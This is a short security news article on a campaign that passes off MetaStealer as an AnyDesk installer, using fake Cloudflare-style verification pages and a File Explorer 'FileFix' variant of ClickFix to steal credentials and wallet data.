Cybersecurity researchers have uncovered a campaign that weaponizes one of the most trusted remote access tools. By disguising malware as an installer for AnyDesk, attackers lure victims searching online for the software into downloading MetaStealer, a credential-stealing program. Victims are led to fraudulent sites designed with polished human verification prompts resembling Cloudflare’s security screens, making the deception appear routine and convincing.
Final Call: Be DPDP Act Ready with FCRF’s Certified Data Protection Officer Program
The ClickFix Technique Evolved
This attack is a reinvention of the classic ClickFix scam. Traditionally, users were tricked into copying commands into Windows’ Run dialogue box, a step that delivered malicious payloads. In this campaign, however, hackers employ “FileFix,” a variant that exploits Windows File Explorer. With a single click on the fake verification button, the website triggers a hidden search function, seamlessly connecting the victim’s device to a server under attacker control. The shift from visible commands to silent system-level actions makes the scam harder to detect, increasing its success rate.
From Verification to Infection
Once activated, the attack downloads a file disguised as Readme Anydesk.pdf. The deception runs deeper: the installer appears to run the genuine AnyDesk setup in the background, creating an illusion of legitimacy, while MetaStealer silently embeds itself in the system. This malware is designed to steal login credentials, browser data, and even crypto wallet information. The dual-action delivery reduces suspicion and ensures the malware gains a foothold before users realize anything is amiss.
A Wider Trend of “Fix” Scams
Security experts see this campaign as part of a larger evolution in social engineering attacks. By blending recognizable tools, like Cloudflare-style verification, with technical shortcuts inside Windows, attackers amplify the believability of their schemes. These scams thrive on urgency and familiarity—pressuring users to verify quickly while disguising malicious actions as ordinary system processes. Researchers warn that without awareness and caution, victims may unwittingly hand attackers the keys to their most sensitive data.